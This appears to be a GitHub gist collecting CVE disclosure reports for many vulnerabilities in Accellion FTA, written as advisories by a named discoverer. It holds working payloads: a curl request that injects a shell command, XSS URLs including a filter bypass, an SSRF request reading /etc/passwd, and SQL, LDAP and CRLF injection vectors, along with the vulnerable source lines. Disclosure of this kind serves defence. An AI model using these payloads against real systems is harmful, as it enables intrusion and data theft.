Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Accellion FTA CVEs
RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This Payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> all versions before Accellion FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a specifically crafted CURL request to the user
> https://whitehat-fta.accellion.net/seos/1000/find.api a remote
> attacker will be able to execute code
>
> ------------------------------------------
DOM XSS: CVE-2017-8304
> POC: https://fta/courier/1000@/oauth/playground/callback.html#<img src=x onerror=alert('xss')>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> The issue is caused by a javascript code doing
> $('redirect_uri').innerHTML = location.href;
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
RXSS:CVE-2017-8760
> Accellion FTA tries to use internal WAF filters to stop specific XSS
> Vulnerabilities. However, these can be bypassed by using some
> modifications to the payloads
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> FTA before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> https://FTA/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E
>
> ------------------------------------------
>
> [Reference]
> https://accellion.com/
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
CRLF CVE-2017-8788
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> there is a CRLF vulnerability in settings_global_text_edit.php because of
> 228: $html_id = ($_GET['html_id'] : $_POST['html_id']);
> 33: $display = ($_GET['display'] : $_POST['display']);
> header('Location: settings_global_text_edit.html?simple=1&display=' . $display .
> '&saved=1&html_id=' . $html_id . '&text=' . urlencode($_POST['service_name'] : $_POST['wc_disclaimer']));
>
> which attacker can exploit by sending ?display=x%0Dnewline in Google Chrome and IE
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
SQL Injection CVE-2017-8789
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> report_error.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 65: $year1 = $_GET['year1'];
> 165: $sql = 'SELECT COUNT(*) FROM t_error_log ' . "\n" . ' WHERE c_timestamp >= \'' . $year1 . '-' . $month1 ....
>
> attacker can send report_error.php?year='payload
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
LDAP Injection CVE-2017-8790
> [VulnerabilityType Other]
> LDAP Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180 home/seos/courier/ldaptest.html POST parameter "filter" can be used to
> perform LDAP Injection attacks
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 80: $_POST['filter'] ='objectclass=*'; //unsanitized
> 118:$result = ldap_search($conn, $_POST['basedn'], $_POST['filter'])))
>
> by sending a POST request to ...
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Http response splitting In home/seos/courier/login.html
>
> 29: $login_param.= '&auth=oauth&admin=1&auth_params=' .($_GET['auth_params'] :
> $_POST['auth_p arams']); //unsanitized params of GET and POST
> 01: $ldap_err = '&ldap_err_msg=1'; 121: header('Loc ...
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> By using home/seos/courier/login.html?auth_params=x%0Dnew:header or POST of 'auth_p arams'
> attacker will be able to split headers and cause a CRLF attack
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8791.
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/user_add.html
>
> 476: $back = ($_POST['param'] : 'user_list.html'); 503: echo '';
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a POST request to the param parameter to user_add.html with
> a paylaod like <script>alert()</script> attacker can cause XSS attacks
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8792.
> [Suggested description]
> by sending a POST request to that URL with
> attacker domain to the acallow parameter, server will respond with
> Access-Control-Allow-Origin header allowing attacker site access.
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> SOP Bypass
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In home/seos/courier/web/wmProgressstat.html.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 36: if(((isset($_POST['acallow']) &&isset($_POST['cka'])) &&$_POST['cka'] == 1))//required
> 37: $acallow = $_POST['acallow'];//unsanitized
> 38: header('Access-Control-Allow-Origin: https://'. $acallow);
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8793.
> [VulnerabilityType Other]
> Server Side Request Forgery
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> /courier/web/1000@/wmProgressval.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> because regexp is missing a ^ char in the start, so it's enough to have https: somewhere later in the url,
> so file:///etc/passwd#https:/... works
>
> Payload: curl -i 'https://whitehat-fta.accellion.net/courier/web/1000@/wmProgressval.html'
> --data 'server=file:///etc/passwd#https://xwhitehat-fta.accellion.net'
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8794.
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/smtpg_add.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross Site Scripting In home/seos/courier/smtpg_add.html.php
> 162: $back = ($_POST['param'] : 'smtpg_list.html'); //unsanitized POST*'param'+ 177: echo '';
> 177: echo "<input class=\'button\'type=\'button\'value=\'Back\'onClick=\'window.location=".htmlentities($back)."'">
>
> By sending payloads like javascript:alert(0) to the POST `param` attacker will be able to execute attacks.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8795.
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In /seos/courier/communication_p2p.php
>
> 19: $app_id = $_POST['app_id']; Then line
> 21: $sql = 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id=' . mysql_real_escape_string( $app_id );
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> This bug is a perfect example of an incorrect usage of the function
> mysql_real_escape_string. Since the function is suppose to help with
> escaping quotes but there are zero quotes in there. So attacker can
> still execute SQL statements without sending any quotes, simply by
> adding his statement like
> X AND UNION DO THIS-
>
> This will execute:
>
> 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id= X AND UNION DO THIS-
> As you can clearly see, you need to put things in quote before calling
> the function or the function it self will have nothing to escape
> quotes from.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8796.
@Hoom21
Copy link

Hoom21 commented Jun 5, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment